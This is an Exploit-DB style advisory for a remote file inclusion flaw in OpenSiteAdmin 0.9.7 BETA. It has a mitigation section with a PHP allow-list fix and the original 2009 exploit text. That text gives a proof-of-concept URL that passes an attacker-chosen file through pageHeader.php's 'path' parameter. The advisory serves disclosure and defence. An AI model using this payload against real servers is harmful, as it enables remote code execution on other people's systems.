Vendor: OpenSiteAdmin
By: EA Ngel
CVSS: 5.5 (MEDIUM)
CWE: Remote File Include
Product Name: OpenSiteAdmin
Affected Version From: 0.9.7 BETA
Affected Version To: 0.9.7 BETA
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

OpenSiteAdmin 0.9.7 BETA Remote File Include Vulnerability

OpenSiteAdmin 0.9.7 BETA is vulnerable to remote file inclusion. The 'path' parameter of 'pageHeader.php' accepts an attacker-supplied file path, which allows the attacker to include and execute arbitrary files on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of OpenSiteAdmin or apply appropriate security measures to prevent unauthorized access and file inclusion.
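
One way to close the include path described above, as an added example (not OpenSiteAdmin's code): the request value only selects an entry from a fixed allow-list and is never concatenated into a file path. The directory layout, the map entries and the function name resolveInclude are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical layout: includable files live in ./includes next to this script.
const INCLUDE_BASE = __DIR__ . '/includes';

// Allow-list of logical names -> files. Request data never becomes a path.
const ALLOWED_INCLUDES = [
    'header' => 'header.php',
    'footer' => 'footer.php',
];

/**
 * Map a requested logical name to a real file inside INCLUDE_BASE.
 * Returns null for anything not on the allow-list (URLs, traversal
 * strings, unknown names) or for a file that resolves outside the base.
 */
function resolveInclude(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, ALLOWED_INCLUDES)) {
        return null;
    }
    $base = realpath(INCLUDE_BASE);
    $file = realpath(INCLUDE_BASE . '/' . ALLOWED_INCLUDES[$requested]);
    if ($base === false || $file === false) {
        return null; // directory or file missing on disk
    }
    // Containment check: guards against symlinks or a bad allow-list entry.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Pattern the advisory describes, in assumed form (contrast only):
//   include $path . 'file.php';   // $path comes straight from the request

$raw = $_GET['path'] ?? null;
$target = resolveInclude(is_string($raw) ? $raw : null);
if ($target === null) {
    http_response_code(400);
    error_log('pageHeader: rejected include request'); // leaves a trail for detection
    exit('Bad request');
}
require $target;
```

Setting `allow_url_include = Off` in php.ini adds a second layer: `include` and `require` then refuse URL wrappers even if a request value does reach them.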

Exploit-DB raw data:

                     [#]OpenSiteAdmin 0.9.7 BETA Remote File Include Vulnerability[#]
                        ----------------------------------------------------------



[@]=====================================================================================================[@]
[+] Author	 	 : EA Ngel
[+] Location    	 : Republik Rakyat Indonesia [RRI]
[+] Situs          	 : www[dot]manadocoding[dot]net
[+] Contact        	 : engelpemula[at]gmail[at]com
[+] Download Script	 : http://sourceforge.net/projects/opensiteadmin/files/
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3rr0r Bu9		 : - pageHeader.php
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3xpl0it		 : http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?]
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Sp3ci4l Th4nks  	 : str0ke > basix > cr4wl3r > kamuiclone > Mr.C > kamuiclone > cokiki > cyberlog
[+]                        angky_tatoki > doniskynet > rezagmas > g4pt3k > my_wisdom > hmei7 > k3nz0 
[+]		           wishnu > bl4ck_3n91n3 > Mr.Crossbeam > kiddies > yadiyauri > zpy > moon_lee 
[+]		           c6 > and friends
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Greetz t00		 : All crew ManadoCoding and All Crew SekuritiOnline
[@]=====================================================================================================[@]


					* GOD BLESS ALL *

# milw0rm.com [2009-09-17]